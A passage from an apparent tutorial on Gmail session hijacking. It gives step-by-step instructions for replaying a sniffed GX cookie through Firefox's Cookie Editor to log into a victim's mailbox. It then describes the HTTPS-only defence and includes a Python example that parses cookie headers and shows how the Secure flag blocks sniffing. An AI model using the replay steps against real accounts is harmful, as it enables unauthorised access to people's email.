Now that we have captured the GX cookie, it is time to use it to replay the attack and log in to the victim's email; for this we will use Firefox and the Cookie Editor add-on.
C] Using Firefox & Cookie Editor to replay the attack.
Open Firefox and log in to your own Gmail account.
From Firefox click on Tools > Cookie Editor.
In the filter box type .google.com and press Filter; in the list below, search for the cookie named GX. If you locate GX, double click on it, delete everything in the Content box, paste the GX cookie you captured in step B, click Save and then Close.
In the address bar of Firefox type mail.google.com and press enter; this replays the victim's GX cookie to the Gmail server and you get logged in to the victim's Gmail account.
Sorry! You can't change the password with a cookie attack.
How to protect yourself from this kind of attack?
Google has provided a way out: you can tell Gmail to always use HTTPS, in which case the session cookie is marked Secure and is only ever sent over an encrypted connection, so it never crosses the network in plain text for a sniffer to pick up. Enable it from the Gmail settings:
Settings > Browser connection > Always use https a
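What makes the replay in Step C possible is that the GX cookie was sent over plain HTTP, and what the "Always use https" setting changes is that Gmail then marks the cookie Secure, so the browser never attaches it to an http:// request at all. The following added example (not from the original post) parses a sniffed Cookie request header the way Step B does by hand, parses the Set-Cookie response header that created the cookie, and decides which cookies a browser would send for a given URL scheme. All header values are constructed; the GX value is the placeholder used in the example above.

```python
"""Cookie-header parsing and the Secure attribute that stops cookie sniffing.
Added example, not from the original post; all header values are constructed
(the GX value is the placeholder used in the walkthrough)."""


def parse_cookie_header(header):
    """Parse a request 'Cookie:' value ('a=1; b=2') into a dict.
    Only the FIRST '=' separates name from value; Gmail values contain '='."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name.strip()] = value.strip()
    return cookies


def extract_gx(header):
    """Step B in code: the value between 'GX=' and the next ';', or None."""
    return parse_cookie_header(header).get("GX")


def parse_set_cookie(header):
    """Parse a response 'Set-Cookie:' value into name, value and attributes.
    Flag attributes (Secure, HttpOnly) become True; others keep their value."""
    first, *attrs = header.split(";")
    name, _, value = first.strip().partition("=")
    cookie = {"name": name.strip(), "value": value.strip(),
              "secure": False, "httponly": False}
    for attr in attrs:
        key, _, val = attr.strip().partition("=")
        key = key.strip().lower()
        if key in ("secure", "httponly"):
            cookie[key] = True
        elif key:
            cookie[key] = val.strip()
    return cookie


def cookies_sent(jar, scheme):
    """Names the browser would attach to a request over 'http' or 'https'.
    A Secure cookie is only ever sent over https, so it cannot be sniffed
    from plain-text traffic; that is what 'Always use https' buys you."""
    return [c["name"] for c in jar if scheme == "https" or not c["secure"]]


# Constructed headers. SNIFFED_COOKIE is the kind of line NetworkMiner shows.
SNIFFED_COOKIE = "S=gmail=abc123:gmail_yj=def; GX=axcvb1mzdwkfefv; PREF=ID=1"
SET_COOKIE_PLAIN = "GX=axcvb1mzdwkfefv; Domain=.google.com; Path=/mail"
SET_COOKIE_HTTPS = "GX=axcvb1mzdwkfefv; Domain=.google.com; Path=/mail; Secure; HttpOnly"


if __name__ == "__main__":
    print(extract_gx(SNIFFED_COOKIE))                                    # axcvb1mzdwkfefv
    jar = [parse_set_cookie(SET_COOKIE_PLAIN)]
    print(cookies_sent(jar, "http"))                                     # ['GX']  exposed
    jar = [parse_set_cookie(SET_COOKIE_HTTPS)]
    print(cookies_sent(jar, "http"), cookies_sent(jar, "https"))         # [] ['GX']
```

Note that the Secure flag only protects the cookie in transit; the replay in Step C works against any session cookie that an attacker obtains by other means, which is why the HttpOnly flag and short session lifetimes matter as well.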